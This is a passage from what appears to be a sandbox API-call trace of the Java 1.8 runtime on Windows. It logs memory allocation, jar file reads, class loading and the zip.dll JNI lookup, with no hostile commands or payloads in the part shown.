(_Block=0x1221ba40) [0096.542] strlen (_Str="java/io/File$PathStatus.class") returned 0x1d [0096.542] strcpy (in: _Dest=0x208e2c0, _Source="java/io/File$PathStatus.class" | out: _Dest="java/io/File$PathStatus.class") returned="java/io/File$PathStatus.class" [0096.542] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3174cbb, lpNewFilePointer=0x208dd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd40*=51858619) returned 1 [0096.542] ReadFile (in: hFile=0x134, lpBuffer=0x208dd90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dd10, lpOverlapped=0x0 | out: lpBuffer=0x208dd90*, lpNumberOfBytesRead=0x208dd10*=0x1e, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3174cf6, lpNewFilePointer=0x208dda0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dda0*=51858678) returned 1 [0096.591] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x32e, lpNumberOfBytesRead=0x208dd70, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dd70*=0x32e, lpOverlapped=0x0) returned 1 [0096.591] free (_Block=0x121d8090) [0096.592] free (_Block=0x121d93f0) [0096.593] malloc (_Size=0x48) returned 0x121d94e0 [0096.594] malloc (_Size=0xa0) returned 0x1221ba40 [0096.594] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b608, lpNewFilePointer=0x208d700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d700*=54638088) returned 1 [0096.594] ReadFile (in: hFile=0x134, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d6d0, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208d6d0*=0xa0, lpOverlapped=0x0) returned 1 [0096.594] malloc (_Size=0x15) returned 0x1221b8a0 [0096.594] free (_Block=0x1221ba40) [0096.594] strlen (_Str="java/lang/Enum.class") returned 0x14 [0096.595] strcpy (in: _Dest=0x208d880, _Source="java/lang/Enum.class" | out: _Dest="java/lang/Enum.class") returned="java/lang/Enum.class" [0096.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3174353, lpNewFilePointer=0x208d300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d300*=51856211) returned 1 [0096.595] ReadFile (in: hFile=0x134, lpBuffer=0x208d350, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d2d0, lpOverlapped=0x0 | out: lpBuffer=0x208d350*, lpNumberOfBytesRead=0x208d2d0*=0x1e, lpOverlapped=0x0) returned 1 [0096.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3174385, lpNewFilePointer=0x208d360, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d360*=51856261) returned 1 [0096.595] ReadFile (in: hFile=0x134, lpBuffer=0x2102ed0, nNumberOfBytesToRead=0x936, lpNumberOfBytesRead=0x208d330, lpOverlapped=0x0 | out: lpBuffer=0x2102ed0*, lpNumberOfBytesRead=0x208d330*=0x936, lpOverlapped=0x0) returned 1 [0096.595] free (_Block=0x121d7d30) [0096.595] free (_Block=0x121d9300) [0096.610] strlen (_Str="java/nio/file/Path.class") returned 0x18 [0096.610] malloc (_Size=0x48) returned 0x121d9080 [0096.610] malloc (_Size=0xa0) returned 0x1221ba40 [0096.610] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b5c2, lpNewFilePointer=0x208e140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e140*=54638018) returned 1 [0096.610] ReadFile (in: hFile=0x134, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e110, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208e110*=0xa0, lpOverlapped=0x0) returned 1 [0096.610] malloc (_Size=0x19) returned 0x121d8090 [0096.611] free (_Block=0x1221ba40) [0096.611] strlen (_Str="java/nio/file/Path.class") returned 0x18 [0096.611] strcpy (in: _Dest=0x208e2c0, _Source="java/nio/file/Path.class" | out: _Dest="java/nio/file/Path.class") returned="java/nio/file/Path.class" [0096.611] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3173af7, lpNewFilePointer=0x208dd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd40*=51854071) returned 1 [0096.611] ReadFile (in: hFile=0x134, lpBuffer=0x208dd90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dd10, lpOverlapped=0x0 | out: lpBuffer=0x208dd90*, lpNumberOfBytesRead=0x208dd10*=0x1e, lpOverlapped=0x0) returned 1 [0096.641] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3173b2d, lpNewFilePointer=0x208dda0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dda0*=51854125) returned 1 [0096.641] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x826, lpNumberOfBytesRead=0x208dd70, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208dd70*=0x826, lpOverlapped=0x0) returned 1 [0096.641] free (_Block=0x1221b8a0) [0096.642] free (_Block=0x121d94e0) [0096.644] strlen (_Str="java/nio/file/Watchable.class") returned 0x1d [0096.644] malloc (_Size=0x48) returned 0x121d9850 [0096.644] malloc (_Size=0xa0) returned 0x1221ba40 [0096.644] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b577, lpNewFilePointer=0x208d680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d680*=54637943) returned 1 [0096.644] ReadFile (in: hFile=0x134, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d650, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208d650*=0xa0, lpOverlapped=0x0) returned 1 [0096.644] malloc (_Size=0x1e) returned 0x121d8180 [0096.644] free (_Block=0x1221ba40) [0096.645] strlen (_Str="java/nio/file/Watchable.class") returned 0x1d [0096.645] strcpy (in: _Dest=0x208d800, _Source="java/nio/file/Watchable.class" | out: _Dest="java/nio/file/Watchable.class") returned="java/nio/file/Watchable.class" [0096.645] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31737ad, lpNewFilePointer=0x208d280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d280*=51853229) returned 1 [0096.645] ReadFile (in: hFile=0x134, lpBuffer=0x208d2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d250, lpOverlapped=0x0 | out: lpBuffer=0x208d2d0*, lpNumberOfBytesRead=0x208d250*=0x1e, lpOverlapped=0x0) returned 1 [0096.645] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31737e8, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=51853288) returned 1 [0096.645] ReadFile (in: hFile=0x134, lpBuffer=0x121b54b0, nNumberOfBytesToRead=0x30f, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x121b54b0*, lpNumberOfBytesRead=0x208d2b0*=0x30f, lpOverlapped=0x0) returned 1 [0096.645] free (_Block=0x121d8090) [0096.645] free (_Block=0x121d9080) [0096.665] strlen (_Str="") returned 0x0 [0096.665] strlen (_Str=".dll") returned 0x4 [0096.668] strlen (_Str="") returned 0x0 [0096.668] strlen (_Str=".dll") returned 0x4 [0096.669] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0096.669] malloc (_Size=0x8) returned 0x121a56e0 [0096.669] strlen (_Str="zip.dll") returned 0x7 [0096.669] malloc (_Size=0x8) returned 0x121a5560 [0096.669] strcpy (in: _Dest=0x121a5560, _Source="zip.dll" | out: _Dest="zip.dll") returned="zip.dll" [0096.669] free (_Block=0x121a56e0) [0096.669] strlen (_Str="zip.dll") returned 0x7 [0096.669] strlen (_Str="zip") returned 0x3 [0096.669] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0096.669] malloc (_Size=0x12) returned 0x1221b320 [0096.669] strncpy (in: _Dest=0x1221b320, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoad") returned="_JNI_OnLoad" [0096.669] strcat (in: _Dest=0x1221b320, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0096.670] strcat (in: _Dest=0x1221b320, _Source="zip" | out: _Dest="_JNI_OnLoad_zip") returned="_JNI_OnLoad_zip" [0096.670] strcat (in: _Dest=0x1221b320, _Source="@8" | out: _Dest="_JNI_OnLoad_zip@8") returned="_JNI_OnLoad_zip@8" [0096.670] free (_Block=0x1221b320) [0096.670] strlen (_Str="zip") returned 0x3 [0096.670] strlen (_Str="JNI_OnLoad") returned 0xa [0096.670] malloc (_Size=0xf) returned 0x1221b740 [0096.670] strcpy (in: _Dest=0x1221b740, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0096.670] strcat (in: _Dest=0x1221b740, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0096.670] strcat (in: _Dest=0x1221b740, _Source="zip" | out: _Dest="JNI_OnLoad_zip") returned="JNI_OnLoad_zip" [0096.670] free (_Block=0x1221b740) [0096.670] free (_Block=0x121a5560) [0096.671] strlen (_Str="java/lang/ClassLoader$3.class") returned 0x1d [0096.671] malloc (_Size=0x48) returned 0x121d9ad0 [0096.671] malloc (_Size=0xa0) returned 0x1221ba40 [0096.671] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b52c, lpNewFilePointer=0x208e4e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4e0*=54637868) returned 1 [0096.671] ReadFile (in: hFile=0x134, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e4b0, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208e4b0*=0xa0, lpOverlapped=0x0) returned 1 [0096.671] malloc (_Size=0x1e) returned 0x121d7a30 [0096.671] free (_Block=0x1221ba40) [0096.671] strlen (_Str="java/lang/ClassLoader$3.class") returned 0x1d [0096.672] strcpy (in: _Dest=0x208e660, _Source="java/lang/ClassLoader$3.class" | out: _Dest="java/lang/ClassLoader$3.class") returned="java/lang/ClassLoader$3.class" [0096.672] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31734c0, lpNewFilePointer=0x208e0e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0e0*=51852480) returned 1 [0096.672] ReadFile (in: hFile=0x134, lpBuffer=0x208e130, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e0b0, lpOverlapped=0x0 | out: lpBuffer=0x208e130*, lpNumberOfBytesRead=0x208e0b0*=0x1e, lpOverlapped=0x0) returned 1 [0096.672] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31734fb, lpNewFilePointer=0x208e140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e140*=51852539) returned 1 [0096.672] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2b2, lpNumberOfBytesRead=0x208e110, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e110*=0x2b2, lpOverlapped=0x0) returned 1 [0096.672] free (_Block=0x121d8180) [0096.672] free (_Block=0x121d9850) [0096.684] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned 0x2e [0096.684] malloc (_Size=0x68) returned 0x1220f410 [0096.684] wcscpy (in: _Dest=0x1220f410, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" [0096.684] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll", nBufferLength=0x9, lpBuffer=0x208e838, lpFilePart=0x208e830 | out: lpBuffer="", lpFilePart=0x208e830*=0x0) returned 0x2f [0096.685] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\zip.dll"), fInfoLevelId=0x0, lpFileInformation=0x208e5d0 | out: lpFileInformation=0x208e5d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3761f6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3761f6, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x135c8)) returned 1 [0096.685] free (_Block=0x1220f410) [0096.692] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned 0x2e [0096.692] _wgetcwd (in: _DstBuf=0x0, _SizeInWords=260 | out: _DstBuf=0x0) returned="C:\\Users\\RDhJ0CNFevzX\\Desktop" [0096.692] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0096.692] free (_Block=0x121dc620) [0096.692] malloc (_Size=0x800) returned 0x1221be60 [0096.693] _wfullpath (in: _Buffer=0x1221be60, _Path="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" [0096.693] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned 0x2e [0096.693] wcsncmp (_String1="C:\\P", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0096.693] wcslen (_String="C:\\Program Files") returned 0x10 [0096.693] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x208e920 | out: lpFindFileData=0x208e920*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c6757c, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x4260e0 [0096.694] FindClose (in: hFindFile=0x4260e0 | out: hFindFile=0x4260e0) returned 1 [0096.694] wcslen (_String="Program Files") returned 0xd [0096.694] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0096.694] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208e920 | out: lpFindFileData=0x208e920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c6757c, cFileName="Java", cAlternateFileName="")) returned 0x425ae0 [0096.694] FindClose (in: hFindFile=0x425ae0 | out: hFindFile=0x425ae0) returned 1 [0096.694] wcslen (_String="Java") returned 0x4 [0096.694] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0096.694] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208e920 | out: lpFindFileData=0x208e920*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c6757c, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x4265c0 [0096.694] FindClose (in: hFindFile=0x4265c0 | out: hFindFile=0x4265c0) returned 1 [0096.694] wcslen (_String="jre1.8.0_171") returned 0xc [0096.694] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin") returned 0x26 [0096.694] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin", lpFindFileData=0x208e920 | out: lpFindFileData=0x208e920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb118dac, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3761f6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3761f6, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c6757c, cFileName="bin", cAlternateFileName="")) returned 0x426320 [0096.695] FindClose (in: hFindFile=0x426320 | out: hFindFile=0x426320) returned 1 [0096.695] wcslen (_String="bin") returned 0x3 [0096.695] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned 0x2e [0096.695] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll", lpFindFileData=0x208e920 | out: lpFindFileData=0x208e920*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3761f6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3761f6, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x135c8, dwReserved0=0x0, dwReserved1=0x61c6757c, cFileName="zip.dll", cAlternateFileName="")) returned 0x425de0 [0096.695] FindClose (in: hFindFile=0x425de0 | out: hFindFile=0x425de0) returned 1 [0096.695] wcslen (_String="zip.dll") returned 0x7 [0096.695] free (_Block=0x1221be60) [0096.695] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned 0x2e [0096.697] strlen (_Str="java/io/ExpiringCache$Entry.class") returned 0x21 [0096.697] malloc (_Size=0x48) returned 0x121d9d50 [0096.697] malloc (_Size=0xa0) returned 0x121dc620 [0096.698] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b4dd, lpNewFilePointer=0x208e370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e370*=54637789) returned 1 [0096.698] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e340, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e340*=0xa0, lpOverlapped=0x0) returned 1 [0096.698] malloc (_Size=0x22) returned 0x121d8090 [0096.698] free (_Block=0x121dc620) [0096.698] strlen (_Str="java/io/ExpiringCache$Entry.class") returned 0x21 [0096.699] strcpy (in: _Dest=0x208e4f0, _Source="java/io/ExpiringCache$Entry.class" | out: _Dest="java/io/ExpiringCache$Entry.class") returned="java/io/ExpiringCache$Entry.class" [0096.699] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317326d, lpNewFilePointer=0x208df70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df70*=51851885) returned 1 [0096.699] ReadFile (in: hFile=0x134, lpBuffer=0x208dfc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208df40, lpOverlapped=0x0 | out: lpBuffer=0x208dfc0*, lpNumberOfBytesRead=0x208df40*=0x1e, lpOverlapped=0x0) returned 1 [0096.699] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31732ac, lpNewFilePointer=0x208dfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfd0*=51851948) returned 1 [0096.699] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x214, lpNumberOfBytesRead=0x208dfa0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208dfa0*=0x214, lpOverlapped=0x0) returned 1 [0096.699] free (_Block=0x121d7a30) [0096.699] free (_Block=0x121d9ad0) [0096.705] strlen (_Str="java/util/LinkedHashMap$Entry.class") returned 0x23 [0096.705] malloc (_Size=0x48) returned 0x121d9490 [0096.705] malloc (_Size=0xa0) returned 0x121dc620 [0096.705] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b48c, lpNewFilePointer=0x208e1d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1d0*=54637708) returned 1 [0096.705] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e1a0, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e1a0*=0xa0, lpOverlapped=0x0) returned 1 [0096.705] malloc (_Size=0x24) returned 0x121d7af0 [0096.706] free (_Block=0x121dc620) [0096.706] strlen (_Str="java/util/LinkedHashMap$Entry.class") returned 0x23 [0096.706] strcpy (in: _Dest=0x208e350, _Source="java/util/LinkedHashMap$Entry.class" | out: _Dest="java/util/LinkedHashMap$Entry.class") returned="java/util/LinkedHashMap$Entry.class" [0096.706] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3172fd7, lpNewFilePointer=0x208ddd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddd0*=51851223) returned 1 [0096.706] ReadFile (in: hFile=0x134, lpBuffer=0x208de20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dda0, lpOverlapped=0x0 | out: lpBuffer=0x208de20*, lpNumberOfBytesRead=0x208dda0*=0x1e, lpOverlapped=0x0) returned 1 [0096.707] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3173018, lpNewFilePointer=0x208de30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de30*=51851288) returned 1 [0096.707] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x255, lpNumberOfBytesRead=0x208de00, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208de00*=0x255, lpOverlapped=0x0) returned 1 [0096.708] free (_Block=0x121d8090) [0096.708] free (_Block=0x121d9d50) [0096.743] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned 0x2e [0096.744] malloc (_Size=0x68) returned 0x1220f640 [0096.744] wcscpy (in: _Dest=0x1220f640, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" [0096.744] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll", nBufferLength=0x9, lpBuffer=0x208f358, lpFilePart=0x208f350 | out: lpBuffer="", lpFilePart=0x208f350*=0x0) returned 0x2f [0096.744] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\zip.dll"), fInfoLevelId=0x0, lpFileInformation=0x208f0f0 | out: lpFileInformation=0x208f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3761f6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3761f6, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x135c8)) returned 1 [0096.744] free (_Block=0x1220f640) [0096.745] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned 0x2e [0096.745] malloc (_Size=0x68) returned 0x1220f720 [0096.745] wcscpy (in: _Dest=0x1220f720, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" [0096.745] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll", nBufferLength=0x9, lpBuffer=0x208f358, lpFilePart=0x208f350 | out: lpBuffer="", lpFilePart=0x208f350*=0x0) returned 0x2f [0096.745] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\zip.dll"), fInfoLevelId=0x0, lpFileInformation=0x208f0f0 | out: lpFileInformation=0x208f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3761f6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3761f6, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x135c8)) returned 1 [0096.745] free (_Block=0x1220f720) [0096.746] strlen (_Str="java/lang/ClassLoader$NativeLibrary.class") returned 0x29 [0096.746] malloc (_Size=0x48) returned 0x121d9940 [0096.746] malloc (_Size=0xa0) returned 0x121dc620 [0096.747] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b435, lpNewFilePointer=0x208e4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4c0*=54637621) returned 1 [0096.747] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e490, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e490*=0xa0, lpOverlapped=0x0) returned 1 [0096.747] malloc (_Size=0x2a) returned 0x121daab0 [0096.747] free (_Block=0x121dc620) [0096.747] strlen (_Str="java/lang/ClassLoader$NativeLibrary.class") returned 0x29 [0096.747] strcpy (in: _Dest=0x208e640, _Source="java/lang/ClassLoader$NativeLibrary.class" | out: _Dest="java/lang/ClassLoader$NativeLibrary.class") returned="java/lang/ClassLoader$NativeLibrary.class" [0096.747] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3172914, lpNewFilePointer=0x208e0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0c0*=51849492) returned 1 [0096.747] ReadFile (in: hFile=0x134, lpBuffer=0x208e110, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e090, lpOverlapped=0x0 | out: lpBuffer=0x208e110*, lpNumberOfBytesRead=0x208e090*=0x1e, lpOverlapped=0x0) returned 1 [0096.747] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317295b, lpNewFilePointer=0x208e120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e120*=51849563) returned 1 [0096.747] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x67c, lpNumberOfBytesRead=0x208e0f0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e0f0*=0x67c, lpOverlapped=0x0) returned 1 [0096.748] free (_Block=0x121d7af0) [0096.748] free (_Block=0x121d9490) [0096.767] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0096.767] malloc (_Size=0x2f) returned 0x121d9f30 [0096.768] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0096.768] malloc (_Size=0xf) returned 0x1221b580 [0096.768] strcpy (in: _Dest=0x1221b580, _Source="_JNI_OnLoad@8" | out: _Dest="_JNI_OnLoad@8") returned="_JNI_OnLoad@8" [0096.768] free (_Block=0x1221b580) [0096.768] strlen (_Str="JNI_OnLoad") returned 0xa [0096.768] malloc (_Size=0xc) returned 0x1221b360 [0096.768] strcpy (in: _Dest=0x1221b360, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0096.768] free (_Block=0x1221b360) [0096.769] free (_Block=0x121d9f30) [0096.770] strlen (_Str="java/lang/Terminator.class") returned 0x1a [0096.770] malloc (_Size=0x48) returned 0x121d96c0 [0096.770] malloc (_Size=0xa0) returned 0x121dc620 [0096.770] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b3ed, lpNewFilePointer=0x208e450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e450*=54637549) returned 1 [0096.770] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e420, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e420*=0xa0, lpOverlapped=0x0) returned 1 [0096.770] malloc (_Size=0x1b) returned 0x121d8180 [0096.771] free (_Block=0x121dc620) [0096.771] strlen (_Str="java/lang/Terminator.class") returned 0x1a [0096.771] strcpy (in: _Dest=0x208e5d0, _Source="java/lang/Terminator.class" | out: _Dest="java/lang/Terminator.class") 